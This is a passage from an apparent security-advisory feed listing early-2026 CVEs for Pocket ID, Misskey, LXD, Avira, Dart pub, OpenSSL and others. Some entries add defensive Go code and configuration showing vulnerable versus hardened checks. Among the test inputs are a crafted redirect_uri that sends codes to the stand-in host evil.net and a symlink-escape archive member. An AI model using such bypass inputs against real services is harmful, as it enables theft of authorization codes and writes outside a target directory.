      <p>High Severity</p>

      <h3>Description</h3>
      <p>Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to your services. Prior to 2.4.0, the OIDC token endpoint rejects an authorization code only when both the client ID is wrong and the code is expired. This allows cross-client code exchange and expired code reuse. This vulnerability is fixed in 2.4.0.</p>
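      <p>The defect described above is a conjunction where a disjunction was needed: with <code>&amp;&amp;</code> between the two conditions, a live code presented by a different client passes, and so does an expired code from the right client. The Go sketch below is an added illustration, not Pocket ID's code; the <code>authCode</code> type, the two exchange functions and the client names are assumptions. It puts the vulnerable check next to a hardened one that tests each condition on its own and also enforces the single-use property RFC 6749 expects of authorization codes.</p>

```go
package main

import (
	"errors"
	"fmt"
	"time"
)

// authCode is an authorization code as an OIDC provider stores it between the
// /authorize redirect and the /token exchange. Illustrative type, not Pocket
// ID's data model.
type authCode struct {
	Code      string
	ClientID  string // client the code was issued to
	ExpiresAt time.Time
	Used      bool
}

var (
	errClientMismatch = errors.New("invalid_grant: code was issued to a different client_id")
	errExpired        = errors.New("invalid_grant: code expired")
	errUsed           = errors.New("invalid_grant: code already redeemed")
)

// vulnerableExchange reproduces the logic error the advisory describes: the
// code is rejected only when BOTH the client_id is wrong AND the code has
// expired. A live code presented by another client, or an expired code from
// the right client, is accepted.
func vulnerableExchange(c *authCode, clientID string, now time.Time) error {
	if c.ClientID != clientID && now.After(c.ExpiresAt) {
		return errors.New("invalid_grant")
	}
	return nil
}

// hardenedExchange applies each condition independently, in the order RFC 6749
// section 4.1.3 implies: single use, bound to the requesting client, and still
// within its lifetime. Any one failure is fatal.
func hardenedExchange(c *authCode, clientID string, now time.Time) error {
	if c.Used {
		return errUsed
	}
	if c.ClientID != clientID {
		return errClientMismatch
	}
	if !now.Before(c.ExpiresAt) {
		return errExpired
	}
	c.Used = true // redeem: a second presentation of the same code must fail
	return nil
}

func main() {
	issued := time.Date(2026, 3, 10, 12, 0, 0, 0, time.UTC)
	code := &authCode{Code: "SplxlOBeZQQYbYS6WxSbIA", ClientID: "app-a", ExpiresAt: issued.Add(time.Minute)}

	// Constructed scenarios: which client presents the code, and when.
	cases := []struct {
		label    string
		clientID string
		at       time.Time
	}{
		{"cross-client exchange while code is live", "app-b", issued.Add(10 * time.Second)},
		{"right client, code expired", "app-a", issued.Add(2 * time.Minute)},
		{"right client, code live", "app-a", issued.Add(10 * time.Second)},
		{"replay of the redeemed code", "app-a", issued.Add(20 * time.Second)},
	}
	for _, tc := range cases {
		fmt.Printf("%-42s vulnerable=%v hardened=%v\n", tc.label,
			vulnerableExchange(code, tc.clientID, tc.at),
			hardenedExchange(code, tc.clientID, tc.at))
	}
}
```

      <p>The vulnerable function only fails when the wrong client presents an already expired code, which is the one combination a real attacker has no reason to try.</p>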

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28513">https://www.tenable.com/cve/CVE-2026-28513</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28512]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28512</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28512</guid>
            <pubDate>Tue, 10 Mar 2026 17:38:50 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Pocket ID is an OIDC provider that allows users to authenticate with their passkeys to your services. From 2.0.0 to before 2.4.0, a flaw in callback URL validation allowed crafted redirect_uri values containing URL userinfo (@) to bypass legitimate callback pattern checks. If an attacker can trick a user into opening a malicious authorization link, the authorization code may be redirected to an attacker-controlled host. This vulnerability is fixed in 2.4.0.</p>
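      <p>The bypass works because a wildcard pattern matched against the whole redirect_uri string lets the wildcard swallow <code>user@host/</code>, so a URI such as <code>https://app.example.com@evil.net/x.example.com/callback</code> satisfies the pattern while the browser delivers the code to evil.net. The Go example below is an added illustration of that class of bug, not Pocket ID's validation code: the pattern syntax, function names and sample URIs are assumptions. It contrasts a naive string match with a component-wise comparison that parses both sides, refuses any userinfo, and lets a leading <code>*.</code> stand for exactly one host label.</p>

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// patternToRegexp turns a wildcard callback pattern such as
// "https://*.example.com/callback" into an anchored regexp over the whole
// redirect_uri string. This is the shape of check the advisory describes as
// bypassable; it is an illustration, not Pocket ID's code.
func patternToRegexp(pattern string) *regexp.Regexp {
	parts := strings.Split(pattern, "*")
	for i := range parts {
		parts[i] = regexp.QuoteMeta(parts[i])
	}
	return regexp.MustCompile("^" + strings.Join(parts, ".*") + "$")
}

// vulnerableMatch accepts redirect_uri if the raw string matches the pattern.
// Because "*" became ".*", it can swallow "@evil.net/...", so the browser is
// sent to a host the pattern never named.
func vulnerableMatch(pattern, redirectURI string) bool {
	return patternToRegexp(pattern).MatchString(redirectURI)
}

// hardenedMatch parses both sides and compares URL components rather than
// strings: userinfo and fragments are refused outright, scheme, port and path
// must be identical, and a leading "*." in the pattern host stands for exactly
// one DNS label.
func hardenedMatch(pattern, redirectURI string) bool {
	p, err := url.Parse(pattern)
	if err != nil {
		return false
	}
	u, err := url.Parse(redirectURI)
	if err != nil {
		return false
	}
	if u.User != nil || u.Fragment != "" || u.Opaque != "" {
		return false // RFC 6749 section 3.1.2: no fragment; userinfo is never legitimate here
	}
	if u.Scheme != p.Scheme || u.Port() != p.Port() || u.Path != p.Path {
		return false
	}
	ph, uh := strings.ToLower(p.Hostname()), strings.ToLower(u.Hostname())
	if !strings.HasPrefix(ph, "*.") {
		return uh == ph
	}
	suffix := ph[1:] // ".example.com"
	if !strings.HasSuffix(uh, suffix) {
		return false
	}
	label := strings.TrimSuffix(uh, suffix)
	return label != "" && !strings.Contains(label, ".")
}

func main() {
	pattern := "https://*.example.com/callback"
	// Constructed redirect_uri values: one legitimate, the rest hostile or off-pattern.
	for _, uri := range []string{
		"https://app.example.com/callback",
		"https://app.example.com@evil.net/x.example.com/callback",
		"https://a.b.example.com/callback",
		"https://evil.net/callback",
	} {
		fmt.Printf("%-58s naive=%-5v hardened=%v\n", uri,
			vulnerableMatch(pattern, uri), hardenedMatch(pattern, uri))
	}
}
```

      <p>Exact string registration, with no wildcards at all, remains the safest policy; where wildcards are unavoidable, matching only the host label after parsing, as above, keeps the wildcard from reaching into the authority or path.</p>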

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28512">https://www.tenable.com/cve/CVE-2026-28512</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28433]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28433</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28433</guid>
            <pubDate>Tue, 10 Mar 2026 07:43:35 GMT</pubDate>
            <description><![CDATA[
      <p>Low Severity</p>

      <h3>Description</h3>
      <p>Misskey is an open source, federated social media platform. All Misskey servers running versions 10.93.0 and later, but prior to 2026.3.1, contain a vulnerability that allows importing other users' data due to lack of ownership validation. The impact of this vulnerability is estimated to be relatively low, as bad actors would require the ID corresponding to the target file for import. This vulnerability is fixed in 2026.3.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28433">https://www.tenable.com/cve/CVE-2026-28433</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28432]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28432</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28432</guid>
            <pubDate>Tue, 10 Mar 2026 07:43:35 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Misskey is an open source, federated social media platform. All Misskey servers prior to 2026.3.1 contain a vulnerability that allows bypassing HTTP signature verification. Although this is a vulnerability related to federation, it affects all servers regardless of whether federation is enabled or disabled. This vulnerability is fixed in 2026.3.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28432">https://www.tenable.com/cve/CVE-2026-28432</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28431]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28431</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28431</guid>
            <pubDate>Tue, 10 Mar 2026 07:43:35 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>Misskey is an open source, federated social media platform. All Misskey servers running versions 8.45.0 and later, but prior to 2026.3.1, contain a vulnerability that allows bad actors access to data that they ordinarily wouldn't be able to access, due to insufficient permission checks and input validation. This vulnerability occurs regardless of whether federation is enabled or not. This vulnerability could lead to a significant data breach. This vulnerability is fixed in 2026.3.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28431">https://www.tenable.com/cve/CVE-2026-28431</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28384]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28384</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28384</guid>
            <pubDate>Thu, 12 Mar 2026 15:16:27 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>An improper sanitization of the compression_algorithm parameter in Canonical LXD allows an authenticated, unprivileged user to execute commands as the LXD daemon on the LXD server via API calls to the image and backup endpoints. This issue affected LXD from 4.12 through 6.6 and was fixed in the snap versions 5.0.6-e49d9f4 (channel 5.0/stable), 5.21.4-1374f39 (channel 5.21/stable), and 6.7-1f11451 (channel 6.0 stable). The channel 4.0/stable is not affected as it contains version 4.0.10.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28384">https://www.tenable.com/cve/CVE-2026-28384</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28281]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28281</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28281</guid>
            <pubDate>Tue, 10 Mar 2026 17:38:39 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>InstantCMS is a free and open source content management system. Prior to 2.18.1, InstantCMS does not validate CSRF tokens, which allows attackers to grant moderator privileges to users, execute scheduled tasks, move posts to trash, and accept friend requests on behalf of the user. This vulnerability is fixed in 2.18.1.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28281">https://www.tenable.com/cve/CVE-2026-28281</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-28119]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-28119</link>
            <guid>https://www.tenable.com/cve/CVE-2026-28119</guid>
            <pubDate>Thu, 05 Mar 2026 06:16:46 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Axiomthemes Nirvana allows PHP Local File Inclusion. This issue affects Nirvana: from n/a through 2.6.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-28119">https://www.tenable.com/cve/CVE-2026-28119</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-27750]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-27750</link>
            <guid>https://www.tenable.com/cve/CVE-2026-27750</guid>
            <pubDate>Thu, 05 Mar 2026 15:16:12 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Avira Internet Security contains a time-of-check time-of-use (TOCTOU) vulnerability in the Optimizer component. A privileged service running as SYSTEM identifies directories for cleanup during a scan phase and subsequently deletes them during a separate cleanup phase without revalidating the target path. A local attacker can replace a previously scanned directory with a junction or reparse point before deletion occurs, causing the privileged process to delete an unintended system location. This may result in deletion of protected files or directories and can lead to local privilege escalation, denial of service, or system integrity compromise depending on the affected target.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-27750">https://www.tenable.com/cve/CVE-2026-27750</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-27749]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-27749</link>
            <guid>https://www.tenable.com/cve/CVE-2026-27749</guid>
            <pubDate>Thu, 05 Mar 2026 15:16:11 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Avira Internet Security contains a deserialization of untrusted data vulnerability in the System Speedup component. The Avira.SystemSpeedup.RealTimeOptimizer.exe process, which runs with SYSTEM privileges, deserializes data from a file located in C:\ProgramData using .NET BinaryFormatter without implementing input validation or deserialization safeguards. Because the file can be created or modified by a local user in default configurations, an attacker can supply a crafted serialized payload that is deserialized by the privileged process, resulting in arbitrary code execution as SYSTEM.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-27749">https://www.tenable.com/cve/CVE-2026-27749</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-27748]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-27748</link>
            <guid>https://www.tenable.com/cve/CVE-2026-27748</guid>
            <pubDate>Thu, 05 Mar 2026 15:16:11 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Avira Internet Security contains an improper link resolution vulnerability in the Software Updater component. During the update process, a privileged service running as SYSTEM deletes a file under C:\ProgramData without validating whether the path resolves through a symbolic link or reparse point. A local attacker can create a malicious link to redirect the delete operation to an arbitrary file, resulting in deletion of attacker-chosen files with SYSTEM privileges. This may lead to local privilege escalation, denial of service, or system integrity compromise depending on the targeted file and operating system configuration.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-27748">https://www.tenable.com/cve/CVE-2026-27748</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-27704]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-27704</link>
            <guid>https://www.tenable.com/cve/CVE-2026-27704</guid>
            <pubDate>Wed, 25 Feb 2026 16:23:26 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>The Dart and Flutter SDKs provide software development kits for the Dart programming language. In versions of the Dart SDK prior to 3.11.0 and the Flutter SDK prior to version 3.41.0, when the pub client (`dart pub` and `flutter pub`) extracts a package in the pub cache, a malicious package archive can have files extracted outside the destination directory in the `PUB_CACHE`. A fix has been landed in commit 26c6985c742593d081f8b58450f463a584a4203a. By normalizing the file path before writing the file, the attacker can no longer traverse up via a symlink. This patch is released in Dart 3.11.0 and Flutter 3.41.0. All packages on pub.dev have been vetted for this vulnerability. New packages are no longer allowed to contain symlinks. The pub client itself doesn't upload symlinks, but duplicates the linked entry, and has been doing this for years. Those whose dependencies are all from pub.dev, third-party repositories trusted to not contain malicious code, or git dependencies are not affected by this vulnerability.</p>
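      <p>The fix described above is a classic archive-extraction hardening: normalize each member name before touching the filesystem, and never let a write pass through a symlink that an earlier member (or anything else) planted under the destination. The Go program below is an added illustration of that technique, not the pub client's code (pub is written in Dart; the commit referenced above is the authoritative fix). The <code>tarOf</code> helper, the function names and the sample member names are constructed for the example. It rejects absolute and dot-dot names after normalization, refuses symlink and hardlink members outright, and before writing a regular file checks every path component between the destination and the target with <code>Lstat</code> so a planted link cannot redirect the write.</p>

```go
package main

import (
	"archive/tar"
	"bytes"
	"fmt"
	"io"
	"os"
	"path/filepath"
	"strings"
)

// tarOf returns a one-member tar stream built in memory (constructed sample
// input; body is the file content, or the link target for a symlink).
func tarOf(name string, typ byte, body string) []byte {
	var buf bytes.Buffer
	tw := tar.NewWriter(&buf)
	hdr := &tar.Header{Name: name, Typeflag: typ, Mode: 0o644, Size: int64(len(body))}
	if typ == tar.TypeSymlink {
		hdr.Linkname, hdr.Size = body, 0
	}
	tw.WriteHeader(hdr)                // in-memory sink with a consistent Size:
	io.WriteString(tw, body[:hdr.Size]) // these cannot fail for the members used here
	tw.Close()
	return buf.Bytes()
}

// safeTarget maps a member name onto a path inside dest: normalise first (the
// step the fix adds), reject anything that still climbs above dest, then refuse
// to write through any existing symlink between dest and the target.
func safeTarget(dest, name string) (string, error) {
	dest = filepath.Clean(dest)
	rel := filepath.Clean(filepath.FromSlash(name))
	if filepath.IsAbs(rel) || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", fmt.Errorf("%q: escapes destination", name)
	}
	target := filepath.Join(dest, rel) // equals dest for a "./" member
	for p := target; len(p) > len(dest); p = filepath.Dir(p) {
		switch fi, err := os.Lstat(p); {
		case os.IsNotExist(err):
			continue // not created yet; MkdirAll below makes a real directory
		case err != nil:
			return "", err
		case fi.Mode()&os.ModeSymlink != 0:
			return "", fmt.Errorf("%q: path passes through symlink %s", name, p)
		}
	}
	return target, nil
}

// extractTar unpacks archive into dest and returns the files it wrote. Link
// members are refused outright and the first violation aborts the extraction.
func extractTar(archive []byte, dest string) ([]string, error) {
	var written []string
	tr := tar.NewReader(bytes.NewReader(archive))
	for {
		hdr, err := tr.Next()
		if err == io.EOF {
			return written, nil
		}
		if err != nil {
			return written, err
		}
		target, err := safeTarget(dest, hdr.Name)
		if err != nil {
			return written, err
		}
		switch hdr.Typeflag {
		case tar.TypeDir:
			err = os.MkdirAll(target, 0o755)
		case tar.TypeReg:
			var body []byte
			if body, err = io.ReadAll(tr); err == nil {
				err = os.MkdirAll(filepath.Dir(target), 0o755)
			}
			if err == nil {
				if err = os.WriteFile(target, body, 0o644); err == nil {
					written = append(written, target)
				}
			}
		default: // symlinks, hardlinks, devices: never part of a package
			err = fmt.Errorf("%q: member type %q not allowed", hdr.Name, hdr.Typeflag)
		}
		if err != nil {
			return written, err
		}
	}
}

func main() {
	dest, _ := os.MkdirTemp("", "pub-cache-")
	defer os.RemoveAll(dest)
	_ = os.Symlink(os.TempDir(), filepath.Join(dest, "escape")) // constructed: a planted link
	for _, m := range []string{"pkg/lib/a.dart", "pkg/../../x.dart", "escape/pwned.txt"} {
		written, err := extractTar(tarOf(m, tar.TypeReg, "void main() {}"), dest)
		fmt.Printf("%-20s wrote=%d err=%v\n", m, len(written), err)
	}
}
```

      <p>Normalization alone is not enough: <code>escape/pwned.txt</code> is a perfectly clean relative name, and only the per-component <code>Lstat</code> walk stops it from landing outside the cache once <code>escape</code> is a symlink. Refusing link members entirely, as pub.dev now does for new packages, removes the way such a link gets planted in the first place.</p>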

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-27704">https://www.tenable.com/cve/CVE-2026-27704</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26982]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26982</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26982</guid>
            <pubDate>Tue, 10 Mar 2026 07:42:41 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Ghostty is a cross-platform terminal emulator. Ghostty allows control characters such as 0x03 (Ctrl+C) in pasted and dropped text. These can be used to execute arbitrary commands in some shell environments. This attack requires an attacker to convince the user to copy and paste or drag and drop malicious text. The attack requires user interaction to be triggered, but the dangerous characters are invisible in most GUI environments so it isn't trivially detected, especially if the string contents are complex. Fixed in Ghostty v1.3.0.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26982">https://www.tenable.com/cve/CVE-2026-26982</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26954]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26954</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26954</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:31 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>SandboxJS is a JavaScript sandboxing library. Prior to 0.8.34, it is possible to obtain arrays containing Function, which allows escaping the sandbox. Given an array containing Function, and Object.fromEntries, it is possible to construct {[p]: Function} where p is any constructible property. This vulnerability is fixed in 0.8.34.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26954">https://www.tenable.com/cve/CVE-2026-26954</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26795]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26795</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26795</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:23 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the module parameter in the M.get_system_log function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26795">https://www.tenable.com/cve/CVE-2026-26795</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26794]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26794</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26794</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a SQL injection vulnerability via the add_group() function. This vulnerability allows attackers to execute arbitrary SQL database operations via a crafted HTTP request.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26794">https://www.tenable.com/cve/CVE-2026-26794</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26793]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26793</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26793</guid>
            <pubDate>Thu, 12 Mar 2026 19:16:16 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the set_config function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26793">https://www.tenable.com/cve/CVE-2026-26793</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26792]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26792</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26792</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>GL-iNet GL-AR300M16 v4.3.11 was discovered to contain multiple command injection vulnerabilities in the set_upgrade function via the modem_url, target_version, current_version, firmware_upload, hash_type, hash_value, and upgrade_type parameters. These vulnerabilities allow attackers to execute arbitrary commands via a crafted input.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26792">https://www.tenable.com/cve/CVE-2026-26792</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26791]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26791</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26791</guid>
            <pubDate>Thu, 12 Mar 2026 18:16:22 GMT</pubDate>
            <description><![CDATA[
      <p>Critical Severity</p>

      <h3>Description</h3>
      <p>GL-iNet GL-AR300M16 v4.3.11 was discovered to contain a command injection vulnerability via the string port parameter in the enable_echo_server function. This vulnerability allows attackers to execute arbitrary commands via a crafted input.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26791">https://www.tenable.com/cve/CVE-2026-26791</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-2673]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-2673</link>
            <guid>https://www.tenable.com/cve/CVE-2026-2673</guid>
            <pubDate>Fri, 13 Mar 2026 19:54:34 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Issue summary: An OpenSSL TLS 1.3 server may fail to negotiate the expected preferred key exchange group when its key exchange group configuration includes the default by using the 'DEFAULT' keyword.</p>

      <p>Impact summary: A less preferred key exchange may be used even when a more preferred group is supported by both client and server, if the group was not included among the client's initial predicted keyshares. This will sometimes be the case with the new hybrid post-quantum groups, if the client chooses to defer their use until specifically requested by the server.</p>

      <p>If an OpenSSL TLS 1.3 server's configuration uses the 'DEFAULT' keyword to interpolate the built-in default group list into its own configuration, perhaps adding or removing specific elements, then an implementation defect causes the 'DEFAULT' list to lose its 'tuple' structure: all server-supported groups are treated as a single sufficiently secure 'tuple', and the server does not send a Hello Retry Request (HRR) even when a group in a more preferred tuple is mutually supported. As a result, the client and server might fail to negotiate a mutually supported post-quantum key agreement group, such as 'X25519MLKEM768', if the client's configuration results in only 'classical' groups (such as 'X25519') being included in the client's initial keyshare prediction.</p>

      <p>OpenSSL 3.5 and later support a new syntax for selecting the most preferred TLS 1.3 key agreement group on TLS servers. The old syntax had a single 'flat' list of groups, and treated all the supported groups as sufficiently secure: if any of the keyshares predicted by the client were supported by the server, the most preferred among these was selected, even if other groups supported by the client but not included in the list of predicted keyshares would have been more preferred. The new syntax partitions the groups into distinct 'tuples' of roughly equivalent security. Within each tuple the most preferred group included among the client's predicted keyshares is chosen, but if the client supports a group from a more preferred tuple and did not predict any corresponding keyshares, the server will ask the client to retry the ClientHello (by issuing a Hello Retry Request or HRR) with the most preferred mutually supported group. The above works as expected when the server's configuration uses the built-in default group list, or explicitly defines its own list by directly defining the various desired groups and group 'tuples'.</p>

      <p>No OpenSSL FIPS modules are affected by this issue; the code in question lies outside the FIPS boundary. OpenSSL 3.6 and 3.5 are vulnerable to this issue. OpenSSL 3.6 users should upgrade to OpenSSL 3.6.2 once it is released. OpenSSL 3.5 users should upgrade to OpenSSL 3.5.6 once it is released. OpenSSL 3.4, 3.3, 3.0, 1.0.2 and 1.1.1 are not affected by this issue.</p>
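      <p>As an added illustration that is not part of the advisory, the openssl.cnf fragment below places the affected configuration pattern next to the explicit-tuple form the advisory says behaves correctly. The group-list syntax ("/" between tuples, ":" within a tuple, "*" for groups the client predicts keyshares for, "?" to ignore groups unknown to the build, "-" to remove a group from DEFAULT) and the default list it expands are assumed to follow SSL_CTX_set1_groups_list(3) in OpenSSL 3.5 and should be verified against the manual page of the installed version; secp521r1 as the removed group is an arbitrary choice for the example.</p>

```ini
# openssl.cnf fragment: TLS 1.3 server group preference (added illustration,
# not text from the advisory; syntax and default list assumed from the 3.5
# SSL_CTX_set1_groups_list(3) manual page, verify against your version).
openssl_conf = openssl_init

[openssl_init]
ssl_conf = ssl_sect

[ssl_sect]
system_default = system_default_sect

[system_default_sect]
# Affected pattern on 3.5.x / 3.6.x before the fix: editing the built-in list
# through DEFAULT flattens its tuples, so a client that predicted only an
# X25519 keyshare is never sent an HRR for X25519MLKEM768 even though both
# sides support it.
#Groups = DEFAULT:-secp521r1

# Workaround: spell the tuples out. This list is assumed to mirror the 3.5
# default with secp521r1 dropped; adjust to local policy, but keep the hybrid
# post-quantum group in its own leading tuple so the server issues an HRR for
# it when the client supports it but sent no keyshare.
Groups = ?*X25519MLKEM768 / ?*X25519:?secp256r1 / ?X448:?secp384r1 / ?ffdhe2048:?ffdhe3072
```

      <p>The same string can be handed to <code>openssl s_server -groups</code> for a quick check; whether the server actually pulled the client up to the hybrid group is visible in the negotiated group reported by <code>openssl s_client</code>. Once the fixed releases are installed, the DEFAULT form is again safe to use.</p>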

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-2673">https://www.tenable.com/cve/CVE-2026-2673</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26148]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26148</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26148</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:43 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>External initialization of trusted variables or data stores in Azure Entra ID allows an unauthorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26148">https://www.tenable.com/cve/CVE-2026-26148</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26144]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26144</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26144</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:43 GMT</pubDate>
            <description><![CDATA[
      <p>Medium Severity</p>

      <h3>Description</h3>
      <p>Improper neutralization of input during web page generation ('cross-site scripting') in Microsoft Office Excel allows an unauthorized attacker to disclose information over a network.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26144">https://www.tenable.com/cve/CVE-2026-26144</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26141]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26141</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26141</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:42 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Improper authentication in Azure Arc allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26141">https://www.tenable.com/cve/CVE-2026-26141</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26134]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26134</link>
            <guid>https://www.tenable.com/cve/CVE-2026-26134</guid>
            <pubDate>Tue, 10 Mar 2026 18:18:42 GMT</pubDate>
            <description><![CDATA[
      <p>High Severity</p>

      <h3>Description</h3>
      <p>Integer overflow or wraparound in Microsoft Office allows an authorized attacker to elevate privileges locally.</p>

      <p>Read more at <a href="https://www.tenable.com/cve/CVE-2026-26134">https://www.tenable.com/cve/CVE-2026-26134</a></p>
    ]]></description>
        </item>
        <item>
            <title><![CDATA[CVE-2026-26123]]></title>
            <link>https://www.tenable.com/cve/CVE-2026-26123</link>
